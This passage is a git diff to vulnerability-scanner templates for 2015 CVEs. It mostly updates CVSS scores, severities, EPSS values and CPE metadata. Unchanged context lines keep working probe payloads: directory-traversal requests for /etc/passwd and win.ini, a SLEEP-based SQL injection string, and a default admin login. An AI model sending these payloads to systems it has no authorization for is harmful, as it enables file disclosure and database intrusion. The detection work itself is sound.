http://packetstormsecurity.com/files/130960/WordPress-AB-Google-Map-Travel-CSRF-XSS.html - https://nvd.nist.gov/vuln/detail/https://nvd.nist.gov/vuln/detail/CVE-2015-2755 + - https://wordpress.org/plugins/ab-google-map-travel/changelog/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P + cvss-score: 6.8 cve-id: CVE-2015-2755 - cwe-id: CWE-79 + cwe-id: CWE-352 + epss-score: 0.02569 + cpe: cpe:2.3:a:ab_google_map_travel_project:ab_google_map_travel:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 verified: true + framework: wordpress + vendor: ab_google_map_travel_project + product: ab_google_map_travel tags: cve2015,xss,wordpress,wp-plugin,wp,ab-map,packetstorm,cve http: @@ -29,7 +35,6 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | @timeout: 10s POST /wp-admin/admin.php?page=ab_map_options HTTP/1.1 diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index f7487d37a1..76c4827d40 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -10,14 +10,20 @@ info: - https://security.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/ - https://wordpress.org/plugins/navis-documentcloud/changelog/ - https://nvd.nist.gov/vuln/detail/CVE-2015-2807 + - https://wpvulndb.com/vulnerabilities/8164 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-2807 cwe-id: CWE-79 + epss-score: 0.00535 + cpe: cpe:2.3:a:documentcloud:navis_documentcloud:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/navis-documentcloud" + framework: wordpress + vendor: documentcloud + product: navis_documentcloud tags: cve,cve2015,wordpress,wp-plugin,xss http: @@ -28,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml index e4d9ac8971..770188294b 100644 --- a/http/cves/2015/CVE-2015-2863.yaml +++ b/http/cves/2015/CVE-2015-2863.yaml @@ -11,13 +11,17 @@ info: - http://www.kb.cert.org/vuls/id/919604 - https://nvd.nist.gov/vuln/detail/CVE-2015-2863 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2015-2863 cwe-id: CWE-601 - tags: cve,cve2015,redirect,kaseya + epss-score: 0.00626 + cpe: cpe:2.3:a:kaseya:virtual_system_administrator:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: kaseya + product: virtual_system_administrator + tags: cve,cve2015,redirect,kaseya http: - method: GET diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml index a5a52148df..4a464ad160 100644 --- a/http/cves/2015/CVE-2015-2996.yaml +++ b/http/cves/2015/CVE-2015-2996.yaml @@ -12,13 +12,17 @@ info: - http://seclists.org/fulldisclosure/2015/Jun/8 - https://nvd.nist.gov/vuln/detail/CVE-2015-2996 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:C + cvss-score: 8.5 cve-id: CVE-2015-2996 cwe-id: CWE-22 + epss-score: 0.77754 + cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.favicon.hash:1540720428 + vendor: sysaid + product: sysaid tags: cve,cve2015,sysaid,lfi,seclists http: @@ -28,6 +32,7 @@ http: - "{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd" stop-at-first-match: true + matchers-condition: and matchers: - type: regex diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml index 9cb879ccc7..f94d264073 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml @@ -11,15 +11,20 @@ info: - https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150410-0_TP-Link_Unauthenticated_local_file_disclosure_vulnerability_v10.txt - http://www.tp-link.com/en/download/TL-WDR3600_V1.html#Firmware - https://nvd.nist.gov/vuln/detail/CVE-2015-3035 + - http://www.tp-link.com/en/download/Archer-C5_V1.20.html#Firmware classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N + cvss-score: 7.8 cve-id: CVE-2015-3035 cwe-id: CWE-22 + epss-score: 0.58993 + cpe: cpe:2.3:o:tp-link:tl-wr841n_\(9.0\)_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"TP-LINK" verified: true + vendor: tp-link + product: tl-wr841n_\(9.0\)_firmware tags: router,lfi,seclists,cve,cve2015,tplink,kev http: diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml index dfc630774c..18ead65f29 100644 --- a/http/cves/2015/CVE-2015-3224.yaml +++ b/http/cves/2015/CVE-2015-3224.yaml @@ -3,21 +3,26 @@ id: CVE-2015-3224 info: name: Ruby on Rails Web Console - Remote Code Execution author: pdteam - severity: critical + severity: medium description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb. reference: - https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/ - https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/ - https://hackerone.com/reports/44513 - https://nvd.nist.gov/vuln/detail/CVE-2015-3224 + - http://lists.fedoraproject.org/pipermail/package-announce/2015-June/160881.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-3224 cwe-id: CWE-284 - tags: ruby,hackerone,cve,cve2015,rce,rails + epss-score: 0.93656 + cpe: cpe:2.3:a:rubyonrails:web_console:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: rubyonrails + product: web_console + tags: ruby,hackerone,cve,cve2015,rce,rails,intrusive http: - method: GET @@ -39,8 +44,8 @@ http: - type: word part: response words: - - "X-Web-Console-Session-Id" - - "data-remote-path=" - - "data-session-id=" + - X-Web-Console-Session-Id + - data-remote-path= + - data-session-id= case-insensitive: true condition: or diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index b34a1d19dc..4c31fc255f 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml @@ -3,22 +3,26 @@ id: CVE-2015-3337 info: name: Elasticsearch - Local File Inclusion author: pdteam - severity: high + severity: medium description: Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled. reference: - https://www.exploit-db.com/exploits/37054/ - - http://web.archive.org/web/20210121084446/https://www.securityfocus.com/archive/1/535385 - https://www.elastic.co/community/security - http://www.debian.org/security/2015/dsa-3241 - https://nvd.nist.gov/vuln/detail/CVE-2015-3337 + - http://packetstormsecurity.com/files/131646/Elasticsearch-Directory-Traversal.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N cvss-score: 4.3 cve-id: CVE-2015-3337 cwe-id: CWE-22 - tags: edb,cve,cve2015,elastic,lfi,elasticsearch,plugin + epss-score: 0.96596 + cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: elasticsearch + product: elasticsearch + tags: packetstorm,edb,cve,cve2015,elastic,lfi,elasticsearch,plugin http: - method: GET @@ -28,9 +32,9 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: diff --git a/http/cves/2015/CVE-2015-3648.yaml b/http/cves/2015/CVE-2015-3648.yaml index ebf754310c..e3098e998d 100644 --- a/http/cves/2015/CVE-2015-3648.yaml +++ b/http/cves/2015/CVE-2015-3648.yaml @@ -7,7 +7,6 @@ info: description: ResourceSpace is prone to a local file-inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. reference: - https://vulners.com/cve/CVE-2015-3648/ - - http://web.archive.org/web/20210122163815/https://www.securityfocus.com/bid/75019/ - http://svn.montala.com/websvn/revision.php?repname=ResourceSpace&path=%2F&rev=6640&peg=6738 - http://packetstormsecurity.com/files/132142/ResourceSpace-7.1.6513-Local-File-Inclusion.html - https://nvd.nist.gov/vuln/detail/CVE-2015-3648 @@ -16,9 +15,13 @@ info: cvss-score: 7.5 cve-id: CVE-2015-3648 cwe-id: CWE-22 - tags: lfi,resourcespace,packetstorm,cve,cve2015 + epss-score: 0.02644 + cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: montala + product: resourcespace + tags: lfi,resourcespace,packetstorm,cve,cve2015 http: - method: GET @@ -27,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml index 8d57066dac..3eecd182e4 100644 --- a/http/cves/2015/CVE-2015-3897.yaml +++ b/http/cves/2015/CVE-2015-3897.yaml @@ -3,7 +3,7 @@ id: CVE-2015-3897 info: name: Bonita BPM Portal <6.5.3 - Local File Inclusion author: 0x_Akoko - severity: high + severity: medium description: Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource. reference: - https://packetstormsecurity.com/files/132237/Bonita-BPM-6.5.1-Directory-Traversal-Open-Redirect.html @@ -11,13 +11,17 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2015-3897 - https://www.htbridge.com/advisory/HTB23259 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2015-3897 cwe-id: CWE-22 - tags: unauth,packetstorm,cve,cve2015,bonita,lfi + epss-score: 0.88702 + cpe: cpe:2.3:a:bonitasoft:bonita_bpm_portal:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: bonitasoft + product: bonita_bpm_portal + tags: unauth,packetstorm,cve,cve2015,bonita,lfi http: - method: GET @@ -26,6 +30,7 @@ http: - "{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini" stop-at-first-match: true + matchers-condition: or matchers: - type: word diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml index ed95ff2b40..bf5d521a22 100644 --- a/http/cves/2015/CVE-2015-4050.yaml +++ b/http/cves/2015/CVE-2015-4050.yaml @@ -3,21 +3,26 @@ id: CVE-2015-4050 info: name: Symfony - Authentication Bypass author: ELSFA7110,meme-lord - severity: high + severity: medium description: Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment in the HttpKernel component. reference: - https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access - http://symfony.com/blog/cve-2015-4050-esi-unauthorized-access - http://www.debian.org/security/2015/dsa-3276 - https://nvd.nist.gov/vuln/detail/CVE-2015-4050 + - http://lists.fedoraproject.org/pipermail/package-announce/2015-June/159513.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-4050 cwe-id: CWE-284 - tags: cve,cve2015,symfony,rce + epss-score: 0.00847 + cpe: cpe:2.3:a:sensiolabs:symfony:2.3.19:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: sensiolabs + product: symfony + tags: cve,cve2015,symfony,rce http: - method: GET @@ -27,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "PHP Credits" - part: body - type: status status: diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index dfd20bda0e..d9b753b1b6 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -3,7 +3,7 @@ id: CVE-2015-4062 info: name: WordPress NewStatPress 0.9.8 - SQL Injection author: r3Y3r53 - severity: critical + severity: medium description: | WordPress NewStatPress 0.9.8 plugin contains a SQL injection vulnerability in includes/nsp_search.php. A remote authenticated user can execute arbitrary SQL commands via the where1 parameter in the nsp_search page to wp-admin/admin.php. reference: @@ -11,16 +11,22 @@ info: - https://wordpress.org/plugins/newstatpress - http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.html - https://nvd.nist.gov/vuln/detail/CVE-2015-4062 + - https://wordpress.org/plugins/newstatpress/changelog/ remediation: | Update to plugin version 0.9.9 or latest. classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:P/A:P + cvss-score: 6.5 cve-id: CVE-2015-4062 cwe-id: CWE-89 + epss-score: 0.03336 + cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 verified: true + framework: wordpress + vendor: newstatpress_project + product: newstatpress tags: authenticated,cve,sqli,wp-plugin,newstatpress,packetstorm,cve2015,wordpress,wp http: @@ -31,7 +37,6 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml index e3b6946a87..da1dbe7d65 100644 --- a/http/cves/2015/CVE-2015-4063.yaml +++ b/http/cves/2015/CVE-2015-4063.yaml @@ -3,7 +3,7 @@ id: CVE-2015-4063 info: name: NewStatPress <0.9.9 - Cross-Site Scripting author: r3Y3r53 - severity: medium + severity: low description: | WordPress NewStatPress plugin before 0.9.9 contains a cross-site scripting vulnerability in includes/nsp_search.php. The plugin allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php. reference: @@ -11,15 +11,21 @@ info: - https://wordpress.org/plugins/newstatpress/ - http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.html - https://nvd.nist.gov/vuln/detail/CVE-2015-4063 + - https://wordpress.org/plugins/newstatpress/changelog/ remediation: Update to plugin version 0.9.9 or latest. classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:S/C:N/I:P/A:N + cvss-score: 3.5 cve-id: CVE-2015-4063 - cwe-id: CWE-80 + cwe-id: CWE-79 + epss-score: 0.04125 + cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 verified: true + framework: wordpress + vendor: newstatpress_project + product: newstatpress tags: cve,cve2015,xss,wordpress,wp-plugin,wp,newstatpress,packetstorm http: @@ -30,7 +36,6 @@ http: Content-Type: application/x-www-form-urlencoded log=admin&pwd=admin123&wp-submit=Log+In - - | GET /wp-admin/admin.php?where1=&searchsubmit=Buscar&page=nsp_search HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml index 46a1273290..a93254e739 100644 --- a/http/cves/2015/CVE-2015-4074.yaml +++ b/http/cves/2015/CVE-2015-4074.yaml @@ -15,9 +15,14 @@ info: cvss-score: 7.5 cve-id: CVE-2015-4074 cwe-id: CWE-22 - tags: lfi,packetstorm,edb,cve,cve2015,joomla,plugin + epss-score: 0.00598 + cpe: cpe:2.3:a:helpdesk_pro_project:helpdesk_pro:*:*:*:*:*:joomla\!:*:* metadata: max-request: 1 + framework: joomla\! + vendor: helpdesk_pro_project + product: helpdesk_pro + tags: lfi,packetstorm,edb,cve,cve2015,joomla,plugin http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index d9e59174b6..7d0779267b 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -12,10 +12,18 @@ info: - https://wordpress.org/plugins/church-admin/changelog/ - https://nvd.nist.gov/vuln/detail/CVE-2015-4127 classification: + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2015-4127 - tags: wp-plugin,wp,edb,wpscan,cve,cve2015,wordpress,xss + cwe-id: CWE-79 + epss-score: 0.0034 + cpe: cpe:2.3:a:church_admin_project:church_admin:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: church_admin_project + product: church_admin + tags: wp-plugin,wp,edb,wpscan,cve,cve2015,wordpress,xss http: - method: GET diff --git a/http/cves/2015/CVE-2015-4414.yaml b/http/cves/2015/CVE-2015-4414.yaml index 2ee42fcb33..a5114ca4a9 100644 --- a/http/cves/2015/CVE-2015-4414.yaml +++ b/http/cves/2015/CVE-2015-4414.yaml @@ -3,21 +3,27 @@ id: CVE-2015-4414 info: name: WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal author: daffainfo - severity: high + severity: medium description: WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. reference: - https://www.exploit-db.com/exploits/37274 - https://nvd.nist.gov/vuln/detail/CVE-2015-4414 - https://www.exploit-db.com/exploits/37274/ - http://packetstormsecurity.com/files/132266/WordPress-SE-HTML5-Album-Audio-Player-1.1.0-Directory-Traversal.html + - https://wpvulndb.com/vulnerabilities/8032 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2015-4414 cwe-id: CWE-22 + epss-score: 0.10802 + cpe: cpe:2.3:a:se_html5_album_audio_player_project:se_html5_album_audio_player:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/se-html5-album-audio-player" + framework: wordpress + vendor: se_html5_album_audio_player_project + product: se_html5_album_audio_player tags: cve,cve2015,wordpress,wp-plugin,lfi,edb,packetstorm http: @@ -27,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml index 8bb53cf4dd..26af7a5705 100644 --- a/http/cves/2015/CVE-2015-4632.yaml +++ b/http/cves/2015/CVE-2015-4632.yaml @@ -9,14 +9,20 @@ info: - https://www.exploit-db.com/exploits/37388 - https://nvd.nist.gov/vuln/detail/CVE-2015-4632 - https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/ + - https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408 + - https://koha-community.org/koha-3-14-16-released/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-4632 cwe-id: CWE-22 - tags: cve,cve2015,lfi,edb + epss-score: 0.05668 + cpe: cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: koha + product: koha + tags: cve,cve2015,lfi,edb http: - method: GET @@ -25,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index 6ceda69e3f..a7328d18c6 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml @@ -3,20 +3,26 @@ id: CVE-2015-4666 info: name: Xceedium Xsuite <=2.4.4.5 - Local File Inclusion author: 0x_Akoko - severity: high + severity: medium description: Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter. reference: - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt - http://packetstormsecurity.com/files/132809/Xceedium-Xsuite-Command-Injection-XSS-Traversal-Escalation.html - https://nvd.nist.gov/vuln/detail/CVE-2015-4666 + - https://support.ca.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html + - https://www.exploit-db.com/exploits/37708/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2015-4666 cwe-id: CWE-22 - tags: xceedium,xsuite,lfi,packetstorm,cve,cve2015 + epss-score: 0.03324 + cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xceedium + product: xsuite + tags: xceedium,xsuite,lfi,packetstorm,cve,cve2015 http: - method: GET @@ -25,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml index 59c3399f70..7d067dba7d 100644 --- a/http/cves/2015/CVE-2015-4668.yaml +++ b/http/cves/2015/CVE-2015-4668.yaml @@ -11,14 +11,19 @@ info: - https://vuldb.com/?id.107082 - https://www.exploit-db.com/exploits/37708/ - https://nvd.nist.gov/vuln/detail/CVE-2015-4668 + - https://support.ca.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2015-4668 cwe-id: CWE-601 - tags: cve,cve2015,redirect,xsuite,xceedium,edb + epss-score: 0.00397 + cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xceedium + product: xsuite + tags: cve,cve2015,redirect,xsuite,xceedium,edb http: - method: GET diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml index ee63cf3545..51c99a77e6 100644 --- a/http/cves/2015/CVE-2015-4694.yaml +++ b/http/cves/2015/CVE-2015-4694.yaml @@ -10,14 +10,20 @@ info: - https://wpscan.com/vulnerability/8047 - https://nvd.nist.gov/vuln/detail/CVE-2015-4694 - http://www.vapid.dhs.org/advisory.php?v=126 + - https://wordpress.org/plugins/zip-attachments/changelog/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2015-4694 cwe-id: CWE-22 + epss-score: 0.01382 + cpe: cpe:2.3:a:zip_attachments_project:zip_attachments:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/zip-attachments" + framework: wordpress + vendor: zip_attachments_project + product: zip_attachments tags: cve2015,wp-plugin,wpscan,lfi,wordpress,cve http: @@ -27,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/cves/2015/CVE-2015-5354.yaml b/http/cves/2015/CVE-2015-5354.yaml index c123772ed4..741931920d 100644 --- a/http/cves/2015/CVE-2015-5354.yaml +++ b/http/cves/2015/CVE-2015-5354.yaml @@ -10,14 +10,19 @@ info: - https://vuldb.com/?id.76181 - http://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html - https://nvd.nist.gov/vul n/detail/CVE-2015-5354 + - https://www.exploit-db.com/exploits/37439/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-score: 5.8 cve-id: CVE-2015-5354 cwe-id: CWE-601 - tags: packetstorm,cve,cve2015,redirect,novius + epss-score: 0.00166 + cpe: cpe:2.3:a:novius-os:novius_os:5.0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: novius-os + product: novius_os + tags: packetstorm,cve,cve2015,redirect,novius http: - method: GET diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index a31c2f96fc..1170f49ccf 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -10,14 +10,20 @@ info: - https://wordpress.org/plugins/stageshow/changelog/ - http://seclists.org/fulldisclosure/2015/Jul/27 - https://nvd.nist.gov/vuln/detail/CVE-2015-5461 + - https://plugins.trac.wordpress.org/changeset/1165310/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N cvss-score: 6.4 cve-id: CVE-2015-5461 cwe-id: NVD-CWE-Other + epss-score: 0.0055 + cpe: cpe:2.3:a:stageshow_project:stageshow:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/stageshow/" + framework: wordpress + vendor: stageshow_project + product: stageshow tags: wpscan,seclists,redirect,cve,cve2015,wordpress,wp-plugin http: @@ -27,6 +33,6 @@ http: matchers: - type: regex + part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - part: header diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml index 08f1d99ac5..bb26a89b34 100644 --- a/http/cves/2015/CVE-2015-5469.yaml +++ b/http/cves/2015/CVE-2015-5469.yaml @@ -15,9 +15,14 @@ info: cvss-score: 7.5 cve-id: CVE-2015-5469 cwe-id: CWE-22 - tags: cve,cve2015,wp,lfi + epss-score: 0.02176 + cpe: cpe:2.3:a:mdc_youtube_downloader_project:mdc_youtube_downloader:2.1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: mdc_youtube_downloader_project + product: mdc_youtube_downloader + tags: cve,cve2015,wp,lfi http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index df75875d9c..31a794faa6 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -10,15 +10,21 @@ info: - http://www.vapid.dhs.org/advisory.php?v=134 - https://nvd.nist.gov/vuln/detail/CVE-2015-5471 - http://packetstormsecurity.com/files/132653/WordPress-WP-SwimTeam-1.44.10777-Arbitrary-File-Download.html + - http://michaelwalsh.org/blog/2015/07/wp-swimteam-v1-45-beta-3-now-available/ remediation: Upgrade to Swim Team version 1.45 or newer. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2015-5471 cwe-id: CWE-22 + epss-score: 0.1035 + cpe: cpe:2.3:a:swim_team_project:swim_team:1.44.10777:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/wp-swimteam" + framework: wordpress + vendor: swim_team_project + product: swim_team tags: cve,cve2015,wordpress,wp-plugin,lfi,wpscan,packetstorm http: @@ -28,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml index c4a0d355fc..a348a4d5cc 100644 --- a/http/cves/2015/CVE-2015-5531.yaml +++ b/http/cves/2015/CVE-2015-5531.yaml @@ -3,21 +3,26 @@ id: CVE-2015-5531 info: name: ElasticSearch <1.6.1 - Local File Inclusion author: princechaddha - severity: high + severity: medium description: ElasticSearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls. reference: - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531 - https://nvd.nist.gov/vuln/detail/CVE-2015-5531 - http://packetstormsecurity.com/files/132721/Elasticsearch-Directory-Traversal.html - https://www.elastic.co/community/security/ + - 